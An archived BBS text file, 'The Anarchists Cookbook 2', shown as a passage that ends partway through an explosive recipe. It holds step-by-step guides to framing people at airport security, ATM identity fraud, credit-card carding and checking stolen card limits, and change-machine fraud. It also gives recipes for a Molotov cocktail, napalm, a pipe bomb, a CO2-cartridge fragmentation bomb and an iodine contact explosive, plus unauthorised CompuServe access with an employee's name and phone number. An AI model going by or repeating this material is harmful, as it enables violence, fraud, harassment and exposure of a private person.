home *** CD-ROM | disk | FTP | other *** search
/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / texts / anarchy_text_a-l / anacook2.wri < prev    next >
Text File  |  1995-09-02  |  231KB  |  5,163 lines

  1. The Anarchists Cookbook 2...More Good Stuff...TeleDoc by...The Uncircumcised Giraffe 
  2.                   Digital Anarchy
  3.                    
  4.                     Airlines
  5.  
  6.   Did an airline ever lose your luggage?
  7.  
  8.   Arrange to have a friend meet you at the terminal gate when you deplane.
  9. Give your friend your baggage claim checks and have him/her retrieve your bags
  10. from the carousel, then leave the baggage area with your bags.  Before your
  11. friend leaves the airport with your luggage, be sure to get your claim checks
  12. back.  Then, you saunter over to the baggage area, spend half an hour waiting
  13. for your bags.  Ask some clerks for help, then report your "missing" luggage,
  14. showing your claim checks as proof.  Very few flights ever have a clerk
  15. actually check the baggage and collect claim checks. It's foolish, but they
  16. don't.  Make a polite, but firm scene and demand satisfaction.  Normally, the
  17. airline people will have you fill out a form and they will attempt to find
  18. your luggage.  Obviously, they won't find it.  Bug them some...write them
  19. letters.  Soon, you should get a good settlement from the airline.  Don't try
  20. to pull this one on the same airline more than once!
  21.  
  22.   Leaving the airlines and aiming for the individual mark, you can do a lot of
  23. personal damage.  For instance, if you find your mark is going to use airline
  24. travel, you could call and cancel the reservations.
  25.  
  26.   You might try to slip a couple rounds of pistol ammunition or a switchblade
  27. in to your mark's pocket just before he goes through the metal detector at the
  28. airport terminal. You could also slip some drugs into his pocket at the same
  29. time.  Read a book on pick pocketing to note the technique for doing this.
  30. It's quite easy.  Leave accurate-looking, but totally bogus hijack scenario
  31. plans, bomb diagrams, or orders of battle for terrorist attacks in airport
  32. bars and restrooms.  This fires up both the rent-a-cops and the real security
  33. people.  The security delays and resultant hassles with passengers create
  34. unhappy people who are angry at airports and airlines.  Naturally, the blame
  35. for these plans must focus on your mark.  If he has really been bugging you
  36. it's about time to get even!
  37.  
  38.  
  39.                     Animals
  40.  
  41.     If your mark is an oily cuss with a credibility problem you should easily
  42. pull off this stunt.  It involves a cop, reporters, SPCA folks and some farm
  43. animals.  Call the police and tell them you know about a cock or dog fight
  44. that's being held at your mark's home.  Explain that you have no morals
  45. against animal fighting but you lost big money there last time and think the
  46. fights are fixed.  Next call your mark and report to him that some people
  47. are holding dog or cock fights on his property.  Call the reporters and SPCA
  48. and tell them all about the fight.  Mention that your mark and the cops have
  49. a payoff relationship.  Give everyone the same general arrival time, never be
  50. too specific.  Hopefully, all will sort of show up at the same time.  You might
  51. manipulate things so the press and animal lovers show up first.  Even if a
  52. real story doesn't develop, you have scattered some strong seeds of distrust.
  53. If you want a stronger story, find a dead dog on the road or something and
  54. plant it near by and tell the reporters and SPCA where to find the evidence.
  55. It will be fun to hear your mark and the cops talk about everything to the
  56. reporters.
  57.  
  58.     Dead animals are very useful.  Wait until your mark goes on a trip and will
  59. be leaving his car or house empty for several days.  Get into the car
  60. or house and stuff very large and very dead animals everywhere.  Your mark will
  61. probably have to sell his car and fumigate his house when he returns.
  62.  
  63.     If you are bothered by big dogs chasing you just take a good quality
  64. plastic water pistol and fill it with freshly squeezed lemon juice.  Shoot
  65. the furball right in the eyes and it'll soon stop the canine harassment.
  66.  
  67.  
  68.               Fun with Automatic Tellers
  69.  
  70.   Preface:  This is not a particularly easy scam to pull off, as it requires
  71. either advanced hacking techniques (TRW or banks) or serious balls (trashing a
  72. private residence or outright breaking & entering), but it can be well worth
  73. your while to the tune of $500 (five hundred) a day.
  74.  
  75.   Laws that will be broken:  Credit Fraud, Wire Fraud, Bank Fraud, Mail Fraud,
  76. Theft Over $200, Forgery, and possibly a few others in the course of setting
  77. the scheme up.
  78.  
  79.   The first step is to target your victim.  The type person you are looking
  80. for is rich.  Very rich.
  81.  
  82.   Now, don't go trying to hit on J.P. Getty or Johnny Carson or someone who
  83. carries a high name recognition.  This will just get you into trouble as
  84. everyone notices a famous person's name floating across their desk.
  85.  
  86.   Instead look for someone who owns a chain of hog feed stores or something
  87. discreet like that.  We targeted a gentleman who is quite active in the silver
  88. market, owning several mines in South Africa and not wanting this to be widely
  89. known (he had no desire to be picketed.)
  90.  
  91.   Next step, take out a p.o. box in this person's name.
  92.  
  93.   Now comes the fun part, requiring some recon on your part.  You need
  94. to know some fairly serious details about this person's bank dealings.
  95.  
  96.     1)  Find out what bank he deals with mainly.  This isn't too difficult
  97.         as a quick run through his office trash will usually let you find
  98.         deposit carbons, withdrawal receipts, or *anything* that has the
  99.         bank name on it.
  100.  
  101.     2)  Find out the account number(s) that he has at the bank.  This can
  102.         usually be found on the above-mentioned receipts.  If not, you can
  103.         get them in TRW (easier said than done) or you can con them out of
  104.         a hassled bank teller over the phone (Use your imagination.  Talk
  105.         slowly and understandingly and give plausible excuses ["I work for
  106.         his car dealership, we need to do a transfer into his account"].)
  107.  
  108.     2a) [optional]  If you can, find out if he has an ATM (Automatic
  109.         Teller) card.  You don't need to know numbers or anything, just
  110.         if a card exists.  This can also be ascertained over the phone
  111.         if you cajole properly.
  112.  
  113.     3)  Armed with this information, go into action.
  114.  
  115.         a) Obtain some nice (ivory quality) stationary.  It doesn't
  116.            have to be engraved or anything, but a $5 or $10 investment
  117.            to put a letterhead with his initials or something on it
  118.            couldn't hurt.  But the most important thing is that it
  119.            look good.
  120.  
  121.         b) Type a nice letter to the bank notifying them of your
  122.            address change.  Some banks have forms you have to fill out
  123.            for that sort of thing, so you need to check with the bank
  124.            first (anonymously, of course).  You will have to have a
  125.            good copy of his signature on hand to sign all forms and
  126.            letters (again, trash his office).
  127.  
  128.         c) Call the bank to verify the new address.
  129.  
  130.         d) IMMEDIATELY upon verifying the change of address, send a
  131.            second letter.  If he already has an ATM card, request a
  132.            second card with the business name engraved in it be sent
  133.            for company use.  If he doesn't have an ATM card, the
  134.            letter should request one for account number xxxxxx.  Ask
  135.            for two cards, one with the wife's name, to add
  136.            authenticity.
  137.  
  138.         e) Go to the bank and ask for a list of all ATM's on the
  139.            bank's network.  Often the state has laws requiring *all*
  140.            machines take *all* cards, so you'll probably be in good
  141.            shape.
  142.  
  143.         f) Await the arrival of your new card.  The PIN (personal
  144.            identification number) is included when they send out a
  145.            card.  After picking up the card, forget that you ever
  146.            even *knew* where the p.o. box was, and make sure you
  147.            didn't leave fingerprints.
  148.  
  149.         g) Begin making the maximum daily withdrawal on the card
  150.            (in most cases $500/day), using a different machine each
  151.            time.  Since many of these machines have cameras on them,
  152.            wear a hat & jacket, or a ski mask to be really paranoid.
  153.            To cut the number of trips you have to make in half, be at
  154.            an ATM a few minutes before midnight.  Make one $500
  155.            withdrawal right before midnight, and another one right
  156.            after.  This cuts down on the number of trips, but police
  157.            or bank officials may spot the pattern and start watching
  158.            machines around midnight.  Use your own judgement.
  159.  
  160.  
  161.   Conclusion: Before using the card, make sure that all fingerprints are wiped
  162. from it.  Usually the first hint you will have that they have caught on to
  163. your scam is that the machine will keep the card.  Also, avoid using machines
  164. in your own town unless it is a big city (Chicago, Milwaukee, Dallas,
  165. etc...). 
  166.  
  167.  
  168.  Bombs
  169.  
  170.                    FIREBOMBS
  171.  
  172.      Most fire bombs are simply gasoline filled bottles with a fuel soaked
  173. rag in the bottle's mouth. The original Molotov cocktail, and still about the
  174. best, was a mixture of one part gasoline and one part motor oil. The oil helps
  175. it to cling to what it splatters on.
  176.  
  177.                     NAPALM
  178.  
  179.      About the best fire bomb is napalm. It has a thick consistency, like
  180. jam and is best for use on vehicles or buildings.
  181.  
  182.      Napalm is simply one part gasoline and one part soap. The soap is
  183. either soap flakes or shredded bar soap. Detergents won't do.
  184.  
  185.      The gasoline must be heated in order for the soap to melt. The usual
  186. way is with a double boiler where the top part has at least a two-quart
  187. capacity. The water in the bottom part is brought to a boil and the double
  188. boiler is taken from the stove and carried to where there is no flame.
  189.  
  190.       Then one part, by volume, of gasoline is put in the top part and
  191. allowed to heat as much as it will and the soap is added and the mess is
  192. stirred until it thickens. A better way to heat gasoline is to fill a bath
  193. tub with water as hot as you can get it. It will hold its heat longer and
  194. permit a much larger container than will the double boiler.
  195.  
  196.  
  197.                 MATCH HEAD BOMB
  198.  
  199.      Simple safety match heads in a pipe, capped at both ends, make a
  200. devastating bomb. It is set off with a regular fuse.
  201.  
  202.      A plastic Baggie is put into the pipe before the heads go in to prevent
  203. detonation by contact with the metal.
  204.  
  205.  
  206.                 FUSE IGNITION FIRE BOMB
  207.  
  208.      A four strand home made fuse is used for this. It burns like fury.  It
  209. is held down and concealed by a strip of bent tin cut from a can.  The
  210. exposed end of the fuse is dipped into the flare igniter. To use this one,
  211. you light the fuse and hold the fire bomb until the fuse has burned out of
  212. sight under the tin. Then throw it and when it breaks, the burning fuse will
  213. ignite the contents.
  214.  
  215.  
  216.                      Bomb 2
  217.                  The Destructor
  218.  
  219. Materials:
  220.  
  221. 1 CO2 Cartridge - Used in BB guns - come in a pack of five - Target sells them
  222.           for $1.50 a pack.  _7+3 _2 Size D Estes model rocket engines - found in most hobby stores where model
  223.                       rockets are sold. (Any size will work but
  224.                       D's have the most powder)
  225. 2 Solar igniters - usually come with the engines - used to ignite the bomb
  226. 1 Bottle of fast drying model glue
  227. 1 Scissors
  228. 1 Funnel
  229. 1 roll of masking tape
  230. 1 hammer
  231. 1 container (jar, cup, glass)
  232. 1 20 foot wire (+ and -)
  233. 1 6 volt (or 12 volt) lantern battery
  234.  
  235.  
  236. Procedure:
  237.  
  238.   The CO2 cartridge is the body of the bomb and when it explodes will fragment
  239. .. so stand back..  Metal flies!!
  240.  
  241.   If you have a CO2 BB gun then you will have many empty cartridges. For those
  242. of you who have never bought CO2 cartridges you will have to find some other
  243. way of emptying them. I have done this on accident before, simply insert a nail
  244. in the top of the cartridge and watch the CO2 gas come out!! Very cold if you
  245. let it touch you. I do not suggest doing it this way, so if possible, ask a
  246. friend who has a CO2 BB gun for their empty CO2 cartridges.
  247.  
  248. Make the hole bigger:
  249.  
  250.   Once you have an empty cartridge you have to make the hole bigger, otherwise
  251. it is very difficult to get the explosive compounds into the cartridge. Take a
  252. nail and pound the hole bigger. The size of the hole is very important. If it
  253. is too big the cartridge will act as a rocket instead of a bomb.
  254.  
  255. Prepare the explosive ingredients:
  256.  
  257.   Unroll the model rocket engines with a pocket knife, until you have the black
  258. chunk of boosting compound. Throw away the unrolling paper. You may remove the
  259. block of clay since this is not explosive. Powder the chunk with the hammer
  260. until you have fine powder. To make the fine powder, lay down some wax paper
  261. on the floor. Find a screen mesh, and filter the powder, leaving the big pieces
  262. on top and the fine powder on the wax paper. Then pour the powder on the wax
  263. paper into a container. After you have the two size D engines powdered and in
  264. the container you are ready to put the powder into the CO2 cartridge.
  265.  
  266. Get the ingredients in the cartridge:
  267.  
  268.   Make a funnel out of paper (a floppy disk jacket works well, with the end
  269. clipped off) and tape it around the end of the cartridge. Slowly pour the
  270. powder from the container into the funnel. You may have to use a toothpick to
  271. help the powder through the funnel and into the cartridge. If your powder is
  272. not fine enough it might jam in the hole and you will have to remove the funnel
  273. and clear the passage. Shake the cartridge every so often until you can't hear
  274. the powder in there. The cartridge is now full of explosive powder.
  275.  
  276. Prepare the igniter:
  277.  
  278.   Clip the paper protector of the igniter with a scissors and bend the wires so
  279. they are relatively straight. (Be careful not to break the igniter when bending
  280. the wires) Coat the igniter with glue except for the ends, and let it dry for a
  281. few minutes. Then insert the igniter into the cartridge leaving the ends
  282. exposed. The tip of the igniter must touch the powder for the powder to ignite.
  283. This should be no problem if you have enough powder in the cartridge. Put glue
  284. around the igniter and the tip of the cartridge and let dry.
  285.  
  286. Connecting the bomb:
  287.  
  288.   Then bend the end wires of the igniter and connect to your 20 foot wire.
  289. Put tape around the end wires and cartridge. The Destructor is now ready to
  290. detonate.
  291.  
  292. Detonating the bomb:
  293.  
  294.   When you have found a place to detonate The Destructor, stretch the
  295. wire the full 20 feet and then touch both wires to the two negative and
  296. positive connectors. This will send a 6 volt charge through the wire and to the
  297. igniter.  The igniter will ignite the explosive compounds in the cartridge and
  298. in a matter of seconds........   BOOM!!!!!!!!!!!!!!
  299.  
  300.  
  301.                  Basic Carding
  302.  
  303.    INTRODUCTION:
  304.      This is an attempt to tutor individuals lacking in the knowledge
  305.  of how to get items from stores without actually paying for them and
  306.  not having to show up in person.  Instead, charge them to someone
  307.  else's credit card (also known as 'CC') account.  This process is
  308.  known as 'credit carding' or just 'carding' amongst people in that
  309.  field of acquiring goods.
  310.  
  311.  STEP I:
  312.  ------
  313.    ACQUIRING CREDIT CARD INFORMATION:
  314.      The first and foremost thing to do is acquire CC information.
  315.  The things that are necessary are:  name of the card holder,
  316.  expiration date, account number, and the CC type. (that is: Visa,
  317.  American Express, MasterCard, etc.)
  318.  
  319.    WHAT TO LOOK FOR:
  320.      In order to get these important bits of information, you would
  321.  have to know where to look.  The cards themselves have all of this
  322.  information right on them.  However, an easier and better place to
  323.  find these things is on the carbons that stores use to put the info.
  324.  on the different sheets to give to The CC company, themselves or
  325.  their bookkeeper, and the customer himself.  On these carbons, it
  326.  should be pretty obvious as to which is which.
  327.  
  328.    HOW-TO GET CARBONS:
  329.      The best way to get the carbons is by rooting through the trash
  330.  cans (or dumpster(s)) of a store.  This process is known as
  331.  'trashing'.  The best places to trash depends on the time of the
  332.  year in which you are looking for the carbons.  For instance, during  _7+3 _ the Christmas season: toy stores, during major season (temperature)
  333.  changes: clothing stores, etc.  Basically, go wherever there is the
  334.  largest buying attraction during that period of time.  Whenever,
  335.  there is no major buying attraction, try independent clothing stores
  336.  or department stores.
  337.  
  338.    TRASHING CLOTHES:
  339.      I suggest that you wear some really grubby, old, etc. clothing
  340.  when you go trashing, because you never know what some of these
  341.  stores are gonna throw away.  If you are kind sqeemish, wear rubber
  342.  gloves and those pant covers that farmers use, I am not sure what
  343.  they are called, but they're made of rubber and will keep the
  344.  nasties away from you when you go trashing.
  345.  
  346.    CARBONS:
  347.      After you have gotten a considerable number (30 - 500) of
  348.  carbons, you need to identify the proper parts of the carbon. The
  349.  important parts of the carbon will look like Diagram 1 does.
  350.  
  351.                D i a g r a m   1
  352.  +------------------------------------------------------------+
  353.  |  Account Number  exp date(1)                               |
  354.  |  exp date(2)     exp date(3)                               |
  355.  |  Card holder's name                                        |
  356.  __r+                                                         |
  357.  |                                                            |
  358.  |                                                            |
  359.  |                                                            |
  360.  |                                                            |
  361.  +------------------------------------------------------------+
  362.  
  363.    CARD HOLDER'S NAME:  (SEE DIAG. 1)
  364.      The card holder's name should be quite clear on all carbons
  365.  that you find in the same place as on diagram one.  If it is not
  366.  there, it should be easy to distinguish from any other information
  367.  on the carbon.
  368.  
  369.    EXP. DATES:  (SEE DIAG. 1)
  370.      The expiration dates can be in two forms.  The forms are
  371.  thus:  XX/XX THRU XX/XX which would be found on exp date(2) and
  372.  is used on American Express cards, and XX-XX which is found in
  373.  either exp date(1) or exp date(3) and is for either VISA or
  374.  MasterCard.
  375.  
  376.     ACCOUNT NUMBER: (SEE DIAG. 1)
  377.       Account numbers are generally found in the top, left-hand
  378.  corner of the carbon.  They can be found in other places, but that
  379.  is the most common.
  380.  
  381.     CARD TYPE:
  382.       The formats of account numbers are quite varied between CC
  383.  companies. Diagram 2 shows which major card types use which
  384.  formats. You can use diagram two, or a reasonable facsimile, for
  385.  identification of CC types on your carbons.  If the number is not
  386.  of any of these formats, discard that carbon, for it'd not be of a  _7+3 _ major accepted gender.
  387.  
  388.               D i a g r a m   2
  389.        +----------------------=----------------------+
  390.        | CC type              | Format of the act. # |
  391.        +----------------------=----------------------+
  392.        | American Express     | XXXX XXXXXX XXXXX    |
  393.        | MasterCard           | XXXX XXXX XXXX XXXX  |
  394.        | Revolv-a-charge      | NXXN XXXX NXXXXX X   |
  395.        | Visa                 | XXXX XXX XXX XXX     |
  396.        +----------------------=----------------------+
  397.                     X represents a number
  398.                     N represents a letter
  399.  
  400.  STEP II:
  401.  -------
  402.     THE DROP SPOT:
  403.       Before you order your merchandise, you must figure out a place
  404.  to send the merchandise.  You do ** NOT **  want the store from
  405.  which you shop, the card holder, or the CC company to know where you
  406.  really live.
  407.  
  408.     QUALIFICATIONS:
  409.       In order for a house to qualify as an inconspicuous drop spot,
  410.  it must meet several requirements.  It must look like a place where
  411.  people could really live and be getting things sent through UPS to
  412.  them.  It must be a place that the owners will not 'visit' too
  413.  regularly.  It may have a 'FOR SALE' sign in front of it, but it is
  414.  better if it doesn't.  And most important of all, it must be a place
  415.  that you can check up on often. Make sure you WRITE DOWN the address
  416.  in a place where you will NOT forget it and where it will be readily
  417.  accessible when you are ordering merchandise. (SEE STEP III)
  418.  
  419.  STEP III:
  420.  --------
  421.     ORDERING MERCHANDISE:
  422.       If you have a catalog or something that you are ordering from,
  423.  then follow the directions given in the book for making phone
  424.  orders.  Make sure the address given is the drop spot's address,
  425.  and NOT yours.  If your voice doesn't sound mature enough to be an
  426.  adults, the order-taker might be suspicious.  There are two ways to
  427.  solve this.  The first is to tell the order taker that you are
  428.  doing this for your parents 'cause they are too busy to order it,
  429.  so they made you do it.  This is risky.  The second and better one
  430.  is to have someone else order it (WHILE YOU WATCH HIM/HER!) for
  431.  you.  The person that does this should be VERY trustworthy. Be sure
  432.  to know the expected time of delivery. (SEE STEP IV)
  433.  
  434.  STEP IV:
  435.  -------
  436.      THE PICK-UP:
  437.        You should leave a little note inside the front door or
  438.  hanging in some place that even the dumbest UPS driver could see.
  439.  This note should be typed or printed and give directions as to
  440.  where to leave the package(s).  Things like the back porch or under  _7+3 _ a tarpaulin or in a box on the front porch usually work best.  And
  441.  say something to the effect of each family member working and that
  442.  you have a tight schedule and anything other than leaving it where
  443.  mentioned would be very inconvenient for you.  You then approach
  444.  the building every other night starting the day after the expected
  445.  delivery to get your 'present'.
  446.  
  447.  
  448.  
  449.                  Credit Checks
  450.  
  451.      When you somehow obtain a card, before you order something, you must first
  452. check the card to see if it is good.  Here is how to do that:
  453.  
  454.  Dial:  1-800-554-2265
  455.  
  456.  10# - Mastercard
  457.  20# - Visa
  458.  1067# - Auth. #
  459.  51# -Merchant Number
  460.  
  461.  CC number + # - when asked for card number
  462.  MMYY + # - When asked for exp. date
  463.  Dolars+*+Cents+# - When asked for amount
  464.  
  465.     Now, here is what you must do to check the limit of the card.  Call up and
  466. enter all the card stuff and when it says amount start at 5000*00#, and it will
  467. almost ALWAYS say declined, unless it is a Preferred or Gold card. From them
  468. on, go down in $1000 increments until it says approved and gives you an auth.
  469. number to write on the customers receipt. Then enter $500, it should say
  470. declined, if it doesn't and says approved, check it for 500 again, then it will
  471. say declined.
  472.  
  473.  
  474.  
  475.                    Cherry Bomb
  476.  
  477. Materials:
  478.  
  479.  1. Ping pong ball.
  480.  2. Black powder.
  481.  3. Fuse, at least 5 in.
  482.  4. Nail polish.
  483.  5. Any type of tape.
  484.  
  485. Procedure:
  486.  
  487.  1. Use an ice pick to poke a hole in the ping pong ball, then use a razor
  488.     blade to make a big enough hole to put the black powder in.
  489.  2. Place the black powder in. Probably 3/4 full is best.
  490.  3. Now, insert the fuse into the ice pick hole.
  491.  4. Cover the entire ball with nail polish. This is used to make it louder.
  492.  5. Finally, cover the whole thing with tape, also used for loudness.
  493.  
  494.  
  495.             Hacking the Compuserve Infomation Service
  496.  
  497.     Compuserve is a multiuser networked Pay by Hour service. But this can
  498.     be beat. At current rates, CIS (Compuserve) charges $6.50 for 300 baud
  499.     and $12.75 for 1200/2400 baud, 9600 can only be accessed by Hardwired
  500.     clients. Thus you see the need for this file. At the time this was
  501.     written, all information in this file was correct. Enough of this, on
  502.     to the file.
  503.  
  504.     Logging on to Compuserve
  505.     ------------------------
  506.     In order to logon to CIS you need one of the following.
  507.      1) A Telenet, Tymnet, Or CIS Port
  508.      2) A Credit Card
  509.      3) Above the IQ of a houseplant
  510.  
  511.     That is all you need, I know for some of you the 3rd one is tough, but
  512.     try. Ok, you have all this, call your local port, logon to CIS, then
  513.     you should get a [User ID:] Prompt, type [177000,5000], this is the Ziff
  514.     PCMagnet User Id. Now, if you entered it correctly, then you should get
  515.     the [Password:] Prompt, at This type [Pc*Magnet]. You will next be given
  516.     a Welcome Message, then, you will get yet another Prompt. It should ask
  517.     you for your Agreement Number, type [Z10D8810]. That is the end of the
  518.     prompts. Here's where the IQ of above a houseplant comes into play.
  519.     You now have to think. It will ask you various questions, ranging from
  520.     your country to your Social Security number. Answer them however you
  521.     want, but I wouldn't use your real info. If you want the second password
  522.     (Needed to access some things), you will have to give an address where
  523.     you can drop by and pick it up. Some ideas are sending to your neighbors,
  524.     but use your last name, it will end up at your house. This is safe, I
  525.     have used it. Or you can rent a Post Office box for about 6 months.
  526.     Once you have done all this, and answer the questions, and read the
  527.     propoganda, you will see [Entering PCMagnet]. You are done.
  528.  
  529.     So what do I do Now?
  530.     --------------------
  531.     Ok, if you get this far, you have the IQ of above your fern. You can
  532.     go one of two places, CIS or PCMagnet (Where you are now). You can
  533.     stay in PCMagnet, but there isn't much there. So, I would type [Go Cis]
  534.     This will bring you to Compuserve. Once on CIS, you can do many thing,
  535.     ranging from downloading files, to real time chat on forums to online
  536.     games. Next, I will list some interesting places to go.
  537.  
  538.     Where do I go?
  539.     --------------
  540.     There are alot on interesting places to go on Compuserve. There are
  541.     some places that you can't access without a second password, so that
  542.     must be attained to get on CB. But you can goto the forums, the
  543.     games, and alot of other things. I will list some places that I like
  544.     to go.
  545.      [Go Rocknet] will bring you to a rather nice forum that is populated
  546.           by some very nice people. It has confrences at 7am till
  547.           9am (Breakfast Club), at 12pm till 1pm (Lunch Bunch),
  548.           and from around 10pm till 1am. I can be found in this
  549.           forum alot.       [Go Hsx100]  will bring you to the Human Sexuality Forum, but it's
  550.           not what you think, they are very interesting people
  551.           that hang around here. The Confrence's there are from
  552.           around 10pm till about 4am. They last a long time.
  553.     These are just my favorites, but if you type [Go Forums], it will
  554.     give you a list of forums that you can Hang around on. There are
  555.     some things to look out for on CIS.
  556.  
  557.     Some sights you will see
  558.     ------------------------
  559.     There are some things to look out for on CIS. You must be careful
  560.     when you see one of these things. They are on the look out for US.
  561.     If you see a [70000,xxxx] id, that is a Security Off7cer, they will
  562.     deleate you if you are not careful. If you see a [70006,xxxx] that
  563.     is a Wizard, he can also deleate you. They some times do not deleate
  564.     you they just /gag you, that means you can't be seen, you are not in
  565.     the userlist. This only applys to Confrence and CB. *LooLoo* is a
  566.     person to be careful not to see, she is a mother fucker. She is a
  567.     powerful person, she can /gag you on any forum, but SHE CAN NOT
  568.     deleate you, only a security account can. Her user id is [70006,522]
  569.     so if you see that ID, be careful. I have talked to her voice on
  570.     several occassions, she is fun to call and bother about CIS, if you
  571.     want her number, it is [614/764-2302] Her real name is Patricia
  572.     Phelps. There is also another not so nice person on Compuserve , he
  573.     is Dan Piskur, he is the Head of Security. He uses the Handles,
  574.     [Dan'l or Ghost] he CAN deleate you on sight.
  575.  
  576.     Misc Info.
  577.     ----------
  578.     Here's come info on Project Numbers. (User Id's)
  579.     70000,xxxx = CIS Security     70003,xxxx = CIS Employe
  580.     70004,xxxx = CIS Employe      70005,xxxx = Radio Shack Demo
  581.     70006,xxxx = Wizard           70007,xxxx = Complementary Account
  582.     76701,xxxx = Forum Sysop      76703,xxxx = Forum Sysop
  583.     76704,xxxx = Forum Sysop      72251,xxxx = Ziff Account (You)
  584.     72261,xxxx = Ziff Account     72271,xxxx = Ziff Account
  585.     72301,xxxx = Ziff Account
  586.     Some things, a Wizard is a very powerful person, they have access
  587.     to /gag you. A Ziff account is an account created by this method.
  588.  
  589.  
  590.  
  591.                  Change Machine Fraud
  592.  
  593.  I.
  594.    There are certain types of money changing machines...The one YOU need is
  595. the kind where ya put yer bill in the tray <lengthwise> ,push the tray in to
  596. get yer change...
  597.  
  598.  II.
  599.    Once you got the right machine,get a $5 or a $1 ,it helps if the bill is
  600. WRINKLED...Then tear a notch in the bill on the lower left side of the bill.
  601. Cut the notch about 3.5 cm. from the lower left hand corner...
  602.  
  603. III.
  604.   Now, go to the machine..put the bill in the tray and slide it in...  Now
  605. what will happen is the machine will have so far read the bill right and it
  606. will spit out yer change..  Then when it reads the notch, it will think the
  607. bill is fucked up and reject it  and like you will have the change  and yer
  608. bill...
  609.  
  610.  For this to werk right you must have done this right..it does take practice
  611. but once you can do this your local Money Changer will be yer bank...
  612.  
  613.  
  614.  
  615.  
  616.  
  617.               How to Pick Master Combination Locks
  618.  
  619.  
  620.  
  621.     1st number:
  622.  
  623.           Get out any of the Master locks so you know what's going on.  The
  624.           handle part (the part that springs open when you get the
  625.           combination), pull on it, but not enough so that the knob won't
  626.           move.  While pulling on it turn the knob to the left until it
  627.           won't move any more. Then add 5 to this number. Congradulations,
  628.           you now have the 1st number.
  629.  
  630.     2nd number:
  631.  
  632.           Ok, spin the dial around a couple of times, then go to the 1st
  633.           number you got, then turn it to the right, bypassing the 1st
  634.           number once. WHEN you have bypassed. Start pulling the handle and
  635.           turning it.  It will eventually fall into the groove and lock.
  636.           While in the groove pull on it and turn the knob. If it is loose
  637.           go to the next groove; if it's stiff you got the second number.
  638.  
  639.     3rd number:
  640.  
  641.           After getting the 2nd, spin the dial, then enter the 2 numbers,
  642.           then after the 2nd, go to the right and at all the numbers pull
  643.           on it.  The lock will eventually open if you did it right. If
  644.           can't do it the first time, be patient, it takes time.
  645.  
  646.  
  647.  
  648.                Preparation of Contact Explosives
  649.  
  650.   The contact explosives we will be describing use only a few chemicals. Some
  651. do need extra caution to keep from causing trouble.
  652.  
  653. Iodine Crystals
  654.  
  655.   Though most people don't realize it, Iodine is not a brown liquid, but a
  656. steel-grey solid. The tincture of iodine you buy at the drugstore actually
  657. contains just a tiny bit of iodine dissolved in a jarful of inexpensive
  658. alcohol, and resold at a huge mark up. We'll be using iodine in the crystalline
  659. form. On contact with your skin, it will produce a dark stain that won't wash
  660. off with soap and water. We'll talk about removing these stains later. If it
  661. gets hot, it vaporizes into a purple cloud, that smells like the chlorine in a
  662. swimming pool. This cloud is dangerous to inhale, since it will condense in
  663. your lungs, and is corrosive. Since we won't need to heat this stuff, it is not
  664. a problem, but you should make sure that you don't let any iodine crystals
  665. spill onto a hot surface. If you don't touch it and keep it away from your
  666. face, you shouldn't have any troubles.
  667.  
  668. Ammonium Hydroxide
  669.  
  670.   This is just good old household ammonia. Be sure to get the clear kind. The
  671. sudsy stuff won't be too useful. It is made from ammonia gas dissolved in
  672. water, and every time you open the bottle, it loses some of its strength, so be
  673. sure to use fresh stuff. We need it to be as strong as possible. Some of the
  674. formulas given here use lab grade concentrated ammonium hydroxide. It is much
  675. stronger than the supermarket kind, and is very unkind to skin or especially
  676. the eyes. It is a good idea to wear eye protection with even the supermarket
  677. grade. Though we don't usually worry about this when using household ammonia
  678. for cleaning, we usually dilute it for that. Here we'll be using it straight
  679. out of the bottle, and it is much more corrosive in that form. Never use this
  680. material if you don't have real good ventilation, as the ammonia vapors can be
  681. overpowering.
  682.  
  683. Potassium Iodide
  684.  
  685.   This is a reasonably safe chemical. You get Potassium ions in some of the
  686. fruit you eat, and Iodide ions (usually as Sodium Iodide) are added to the
  687. table salt you buy at the store. So, while you don't directly eat this
  688. chemical, you do eat the components that make it up. Don't be scared of this
  689. stuff.
  690.  
  691.  
  692. Sodium Thiosulfate
  693.  
  694.   Otherwise known as photographic hypo. When dissolved in water, this will
  695. remove the iodine stains left by touching iodine crystals, and exploding
  696. contact explosive. Not particularly nasty stuff, but make sure to wash it off
  697. after cleaning yourself with it.
  698.  
  699.                General Information
  700.  
  701.   This is a powerful and highly sensitive explosive. A dust sized particle will
  702. make a sharp crack or popping sound. A piece the size of a pencil lead will
  703. produce an explosion as loud as any of the largest firecrackers or cherry
  704. bombs.  It cannot be exploded by any means when wet, and therefore can be
  705. handled and applied with safety. When dry, it will explode with the touch of a
  706. feather, or a breath of air.
  707.  
  708.   The strength of the ammonia water you use will have a direct effect on the
  709. strength of the final product. If you use supermarket ammonia, the explosive
  710. will work, but not as spectacularly as if you use a 15% or higher (10 to 15
  711. molar) solution. The stronger it is, the better. You'll also need filter paper,
  712. and a funnel. A properly folded coffee filter will do nicely if you don't have
  713. the filter paper. If you're not sure how to fold filter paper, check an
  714. elementary chemistry textbook.
  715.  
  716.               Methods of Preparation
  717.  
  718. 1.) Granular Explosive. This is the easiest kind, and the only kind that will
  719. work reasonably well with supermarket ammonia. Crush enough iodine crystals to
  720. make a pile of powder equal to the volume of a pencil eraser. Do not grind into
  721. a fine powder. Put about 4 ounces or 1/2 measuring cup of strong ammonia water
  722. into a small container with the iodine, and seal it for about 5 to 10 minutes,
  723. shaking frequently. While the mixture is reacting, get your filter paper ready.
  724. While it is best to consult a book that shows how to do this, you take the
  725. circle of filter paper, fold it in half, fold it again at right angles to the
  726. first fold, and then open it to form a cone. Open or close it as needed to make
  727. it conform to the angle of the funnel, and moisten it a little to make it stick
  728. in place. Place the funnel over a container that will catch the waste liquid.
  729. Let the mixture settle long enough for the sediment to settle, and pour off as
  730. much of the clear liquid as possible before filtering the sediment. Pour the
  731. remaining liquid and sediment into the filter. The sediment (and the filter
  732. paper covered with it!!!) is your explosive. The small amount you have made
  733. will go a lot farther than you realize. Particularly if you used good strong
  734. ammonia. Place the explosive in an airtight leakproof pill bottle. As this
  735. explosive is unstable by nature, fresh amounts give better results than stale
  736. ones that have been sitting around for a day or so. Best results are obtained
  737. with small fresh batches. But as you'll see, there are a few tricks you can do
  738. with this material that do require it to sit for a day or more.
  739.  
  740. The explosive should be stored and applied while wet.
  741.  
  742. 2.) Paint type explosive. This will use up a lot of iodine crystals. Make up a
  743. strong tincture of iodine using about 4 ounces or 1/2 measuring cup of rubbing
  744. alcohol, denatured alcohol, or wood alcohol.  Wood alcohol is preferable. Add
  745. iodine crystals and shake thoroughly until no more will dissolve.  Pour the
